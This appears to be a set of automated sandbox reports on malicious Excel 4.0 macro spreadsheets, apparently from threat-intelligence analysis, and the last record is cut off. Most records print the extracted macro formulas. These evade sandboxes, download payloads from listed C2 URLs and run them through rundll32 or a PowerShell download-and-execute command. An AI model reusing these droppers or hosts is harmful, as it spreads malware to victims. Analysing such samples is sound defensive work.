{"version":"0.2","sample":{"sample":"","kind":"file","target":"77f932a651b97a0d7a33859c78209cb556aae25c5fca4637bacc541cb95d391b"},"analysis":{"reported":"2020-04-09T16:17:09Z","score":10},"files":[{"filename":"77f932a651b97a0d7a33859c78209cb556aae25c5fca4637bacc541cb95d391b","filesize":209920,"md5":"bb4c8222b1c6241db6a26ed232dbc3b3","sha1":"05ffbc87c719abe37d2356b549714e37c0a563ea","sha256":"77f932a651b97a0d7a33859c78209cb556aae25c5fca4637bacc541cb95d391b","sha512":"7ff26b5ca4c36f0afce9e0510393bf650f1342e6819e8cb47789ba64d496e0692cb5ac9df43eead878380c79079cb6b4e38073f8558211bf5fcb51cd5d8d3985","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"77f932a651b97a0d7a33859c78209cb556aae25c5fca4637bacc541cb95d391b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"H3Z5W2uXTm\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"77fb6f664b4b3e84d0cbf17c952f603e57bfdbe121738ca4513301626a892785"},"analysis":{"reported":"2020-04-09T16:17:10Z","score":10},"files":[{"filename":"77fb6f664b4b3e84d0cbf17c952f603e57bfdbe121738ca4513301626a892785","filesize":167936,"md5":"1fac32a93478a8fd758c50b723b1174c","sha1":"abecde177e514aa0015607b5514f2729f6909839","sha256":"77fb6f664b4b3e84d0cbf17c952f603e57bfdbe121738ca4513301626a892785","sha512":"6d06c7c4a5fe99e44d40f74b066681418964c903fa063244d600ff37887dcba1ea186898e98f5cc8213f1146decba857130b053c56be296b7ad5745e15ad6946","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"77fb6f664b4b3e84d0cbf17c952f603e57bfdbe121738ca4513301626a892785.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Zf0AORG6De\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"782cf9f8c05f116e663c4c968e6269a15992751e402a78c135debe67218d3e39"},"analysis":{"reported":"2020-04-09T16:17:10Z","score":10},"files":[{"filename":"782cf9f8c05f116e663c4c968e6269a15992751e402a78c135debe67218d3e39","filesize":186368,"md5":"3a7627d8df6ac2f3a9fa2aa764ec416e","sha1":"e0686556e1249c33a6dfde2147cf85101f19a61a","sha256":"782cf9f8c05f116e663c4c968e6269a15992751e402a78c135debe67218d3e39","sha512":"d4cb44d852e5e79f651cd4726fa97f422caf71a921fbc1569953ed217eaec2446c0bebb372a35dc160b45d75c3610f35b2f8ee57887ee7328b34de7a568523cd","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"782cf9f8c05f116e663c4c968e6269a15992751e402a78c135debe67218d3e39.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nGET.WORKSPACE(1)\nGET.WORKSPACE(32)\nGET.WINDOW(1)\nIF(GET.WORKSPACE(19),CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,GET.NOTE(R$4C$3),GET.NOTE(R$13C$5),0,0),CLOSE(TRUE))\nIF(ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2),EXEC(GET.NOTE(R$10C$2)),)\nCLOSE(TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"78425afcfc0626694efceabae2ba749f09f9577ec3f1790af9858f13f2cfc448"},"analysis":{"reported":"2020-04-09T16:17:10Z","score":10},"files":[{"filename":"78425afcfc0626694efceabae2ba749f09f9577ec3f1790af9858f13f2cfc448","filesize":152576,"md5":"7ffa91b398973f2d3befcce7442b0ec4","sha1":"06a2b27eedda4f8c4d1d0a60836b071400cfedb4","sha256":"78425afcfc0626694efceabae2ba749f09f9577ec3f1790af9858f13f2cfc448","sha512":"97ac7f5097a1e8470948ffa3f1a3d4b00ca0e544269d6e6aaf22701d332148bba3745d389d7cf0a0b089fb10b48e25265798796d1470420ab5a448fc8bf93992","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"78425afcfc0626694efceabae2ba749f09f9577ec3f1790af9858f13f2cfc448.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/ajt1eg4fh3a"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/ajt1eg4fh3a\",\"c:\\Users\\Public\\awefwef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\awefwef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"P8RA7dWhE0\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"784624c3bb735bca0cc1dce0cdf64f7c99e96156f242d5b1f162f4d9733d5bcf"},"analysis":{"reported":"2020-04-09T16:17:10Z","score":10},"files":[{"filename":"784624c3bb735bca0cc1dce0cdf64f7c99e96156f242d5b1f162f4d9733d5bcf","filesize":152576,"md5":"c4f17cdce0820b418a4384c15b192084","sha1":"878d6727c9b16e86d61beb94cf206bbd776bc785","sha256":"784624c3bb735bca0cc1dce0cdf64f7c99e96156f242d5b1f162f4d9733d5bcf","sha512":"8082981d8047bb8778bb7415282f54766af9228007dbae661ef784989d3b93e80374bf5263f258a63435dc334084202fdada602535558a4f79aea809ffc9197e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"784624c3bb735bca0cc1dce0cdf64f7c99e96156f242d5b1f162f4d9733d5bcf.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/ajt1eg4fh3a"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/ajt1eg4fh3a\",\"c:\\Users\\Public\\awefwef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\awefwef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"C2Swo34DtF\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"7862fb9f199f45fe773893f68d536b7814b5354f1c61ce399f7d2bf1effd4c56"},"analysis":{"reported":"2020-04-09T16:17:10Z","score":10},"files":[{"filename":"7862fb9f199f45fe773893f68d536b7814b5354f1c61ce399f7d2bf1effd4c56","filesize":154120,"md5":"fcc1772aba8ef352bce8f7d3cc513e7c","sha1":"47ef689101fccdb17a2d59c33b8a980fa64492bb","sha256":"7862fb9f199f45fe773893f68d536b7814b5354f1c61ce399f7d2bf1effd4c56","sha512":"07107a1566809abe43d91ce2625e25b7b2bcf8b49b33a870799aeef2bc4d4bcf144ea2cf2f1d656c6519f48418060af8b137740610690ad19aab3820d9c7e501","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"7862fb9f199f45fe773893f68d536b7814b5354f1c61ce399f7d2bf1effd4c56.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"RETURN()\nEXEC(\"powershell.exe -Command IEX (New-Object('Net.WebClient')).'DoWnloAdsTrInG'('ht'+'tp://unoflock.ru/wp-admin/css/d')\")\nHALT()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"786476908e9799aac2d5b97ae60680bd4635b90d72cf091d7db64a55bed47ef3"},"analysis":{"reported":"2020-04-09T16:17:10Z","score":10},"files":[{"filename":"786476908e9799aac2d5b97ae60680bd4635b90d72cf091d7db64a55bed47ef3","filesize":113664,"md5":"844a2ffed3c7bf9758918fc6dbb8b061","sha1":"32e20713f9a02509e48928e0e97037fdc5880017","sha256":"786476908e9799aac2d5b97ae60680bd4635b90d72cf091d7db64a55bed47ef3","sha512":"45c727e1d47c6f0822a43a0511747496effa322d5344a5f32276fba9760cb2eeb3688a18c7db7dcf249d76c60dbc614ec03ccc5fb0af2a20fb25289012eda109","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"786476908e9799aac2d5b97ae60680bd4635b90d72cf091d7db64a55bed47ef3.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/aagaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/aagaeg4df12\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"8ezHIsQEFC\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"78973cc8cc6a367e915507451dacfbbd6db668fa0463e8d613ddf44f42ee8221"},"analysis":{"reported":"2020-04-09T16:17:10Z","score":10},"files":[{"filename":"78973cc8cc6a367e915507451dacfbbd6db668fa0463e8d613ddf44f42ee8221","filesize":145920,"md5":"c6f457c876dcb0d74e5c7479a7a6ab85","sha1":"cf5a6b49024f27de6817146fc95633c13dc1f40a","sha256":"78973cc8cc6a367e915507451dacfbbd6db668fa0463e8d613ddf44f42ee8221","sha512":"8bd7b9cec2ff6cb4ece26278a204eee90aed22285d6a75cb4ad16efad61766f13b03d385652ff7061b6d6c82284ffb15c6366aa1eb2135ae25cd1a79da304d0d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"78973cc8cc6a367e915507451dacfbbd6db668fa0463e8d613ddf44f42ee8221.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://uenoeakd.site/grwrg24g2g"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nRETURN()\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nWORKBOOK.HIDE(\"gftfoELDit\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"78a60b216bb7551c2bf96c3b73fddefad3722f51185c0f6d085982b774085a5a"},"analysis":{"reported":"2020-04-09T16:17:10Z","score":10},"files":[{"filename":"78a60b216bb7551c2bf96c3b73fddefad3722f51185c0f6d085982b774085a5a","filesize":185344,"md5":"1e2f53aa3eba0dab3f95aaac77734aad","sha1":"4ae733f35b6d648e33398732dba7171899f5be2c","sha256":"78a60b216bb7551c2bf96c3b73fddefad3722f51185c0f6d085982b774085a5a","sha512":"4836a16011d4621e75d171b26079125d8c4e8132cf4a10c4fc298f7217b8ee453dce1c314e62674ac5d007fbea6277a7cd1d1fac261c7dee3f2742304ace1479","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"78a60b216bb7551c2bf96c3b73fddefad3722f51185c0f6d085982b774085a5a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"78a70ffe47b63c094d0c62c7b24ec74ed2e4f4782f6396daaf1262bb03b6fbbf"},"analysis":{"reported":"2020-04-09T16:17:10Z","score":10},"files":[{"filename":"78a70ffe47b63c094d0c62c7b24ec74ed2e4f4782f6396daaf1262bb03b6fbbf","filesize":167936,"md5":"8a1f6d784353f9bf693a753abca5bbe2","sha1":"d28546d765f66c30f644345164ffda571fdbfa99","sha256":"78a70ffe47b63c094d0c62c7b24ec74ed2e4f4782f6396daaf1262bb03b6fbbf","sha512":"a7ac20aab5df758a7b6b67df53be0111715ab5873f768bf93d15b17369b5975adc2a1838a7eafff1e0556442eeaff428090911e13e4258d512c647fe37f050ec","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"78a70ffe47b63c094d0c62c7b24ec74ed2e4f4782f6396daaf1262bb03b6fbbf.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"j9LbR5st4p\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"78ac6f031ff165ee3d392c60d3312a2278a531947746e77fa83b0895eff670bc"},"analysis":{"reported":"2020-04-09T16:17:10Z","score":10},"files":[{"filename":"78ac6f031ff165ee3d392c60d3312a2278a531947746e77fa83b0895eff670bc","filesize":206336,"md5":"b38550e9e43ca58b5f10b9526ccc788b","sha1":"6d8f2dc6ef32e025662da47f7157216c32db6a16","sha256":"78ac6f031ff165ee3d392c60d3312a2278a531947746e77fa83b0895eff670bc","sha512":"981764bcccff8f9fe40ac7cf09e8c0fae586c5a89ec075c3dd5e31a6745bd881f1c0aee04d42b5cf468026a34538f321ed8058b4b0213fa60d63a26a16deff1f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"78ac6f031ff165ee3d392c60d3312a2278a531947746e77fa83b0895eff670bc.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"NGyZZojfcR\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"78af9cbb9f7f1ab681bf69396ee2a01678b70155b4e30e1445f3bcca101ae95d"},"analysis":{"reported":"2020-04-09T16:17:10Z","score":10},"files":[{"filename":"78af9cbb9f7f1ab681bf69396ee2a01678b70155b4e30e1445f3bcca101ae95d","filesize":171008,"md5":"8f476eb93a788dbb3e4b33e25621c943","sha1":"bc5b26732fca795ccc3df64ba7c64b4a35e471bd","sha256":"78af9cbb9f7f1ab681bf69396ee2a01678b70155b4e30e1445f3bcca101ae95d","sha512":"483a1760b4bb161c72b936c2ebd85ee6a96605790ce8806ce01b0ba9a7f8b0392bb6b93ffb8280d7f087cb93394c166428c3c16e8d9d5ac5ddda3a1eba46e379","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"78af9cbb9f7f1ab681bf69396ee2a01678b70155b4e30e1445f3bcca101ae95d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://ethelenecrace.xyz/fbb3"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ethelenecrace.xyz/fbb3\",\"c:\\Users\\Public\\bmjn5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bmjn5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"lI0EVoGw3L\",TRUE)\nGOTO(R$1C$10)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\nFOPEN(\"c:\\users\\public\\1.reg\")\nFPOS(FOPEN(\"c:\\users\\public\\1.reg\"),215)\nFILE.DELETE(\"c:\\users\\public\\1.reg\")"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"78bead553add06932ea04f0390deba5b1c1d4a1890b7168e6b7de6991d8bca39"},"analysis":{"reported":"2020-04-09T16:17:10Z","score":10},"files":[{"filename":"78bead553add06932ea04f0390deba5b1c1d4a1890b7168e6b7de6991d8bca39","filesize":185344,"md5":"289a33815ec933e0cc9e0c7c39db3b60","sha1":"411d7e82f09f5f8001cbfd4d08ba185993fdcd99","sha256":"78bead553add06932ea04f0390deba5b1c1d4a1890b7168e6b7de6991d8bca39","sha512":"526b212dfe3cb74c7110fea77279a2a80496f5acd129278b4f2fba915dc4dabcb8856e57f993135cd41f4cbc2764292f4402842811b06e14c5b22e2627250466","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"78bead553add06932ea04f0390deba5b1c1d4a1890b7168e6b7de6991d8bca39.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"78e3fa2eac22ed63119ee3d967f6c81fe500377264c4ec0e2bb25c360ca75a3e"},"analysis":{"reported":"2020-04-09T16:17:10Z","score":10},"files":[{"filename":"78e3fa2eac22ed63119ee3d967f6c81fe500377264c4ec0e2bb25c360ca75a3e","filesize":206336,"md5":"f972f3fa3e2220b22106a02126684d43","sha1":"fc027fdc3921f6397eefeee99522c0c9f0815d8f","sha256":"78e3fa2eac22ed63119ee3d967f6c81fe500377264c4ec0e2bb25c360ca75a3e","sha512":"fef739b1f356ac634aa4b2e1c79d7da86aebc050cf7001dd0815930e79718bff96c09d215e449bcc05dceede5fa5d12438e5f4a705e39ac37d0a3f996a341d3a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"78e3fa2eac22ed63119ee3d967f6c81fe500377264c4ec0e2bb25c360ca75a3e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"ccuIHLG8o8\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"78ebb12fcf62326c12c459addafa2886e42ab58894dea52c6ff44da0dddb69cc"},"analysis":{"reported":"2020-04-09T16:17:10Z","score":10},"files":[{"filename":"78ebb12fcf62326c12c459addafa2886e42ab58894dea52c6ff44da0dddb69cc","filesize":177152,"md5":"4419bdbfa6012a2677902deb2bb92468","sha1":"af9f960bd319490606262232a1bc34a25d585cfd","sha256":"78ebb12fcf62326c12c459addafa2886e42ab58894dea52c6ff44da0dddb69cc","sha512":"99604cc87ddc18f6f32e9930cd95d592c7a60833a1f8767bd5cd69aeacd32d07f25bf10ef9986dd5427753db33b9d136b62f68df708a240e91112f680b485265","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"78ebb12fcf62326c12c459addafa2886e42ab58894dea52c6ff44da0dddb69cc.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hpi5f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"JKgbD1oby7\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"78fb31dc255f089b417a7c413adae01a107ca7d1524315aba1eff08235b8af5f"},"analysis":{"reported":"2020-04-09T16:17:11Z","score":10},"files":[{"filename":"78fb31dc255f089b417a7c413adae01a107ca7d1524315aba1eff08235b8af5f","filesize":116224,"md5":"5cca7343ab337b9ac3137c4feba8e602","sha1":"afdb5c70025f9faa55167c0ea76ff2fc083b5f28","sha256":"78fb31dc255f089b417a7c413adae01a107ca7d1524315aba1eff08235b8af5f","sha512":"aeb5449c28aaf6418583cd858d2624a012ea1625572a0a7e635d444e82ba3f75e32ea2a53c2d115675c3be7eb4aa9d4e1f12070f67931fa981c568f930ba84aa","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"78fb31dc255f089b417a7c413adae01a107ca7d1524315aba1eff08235b8af5f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM 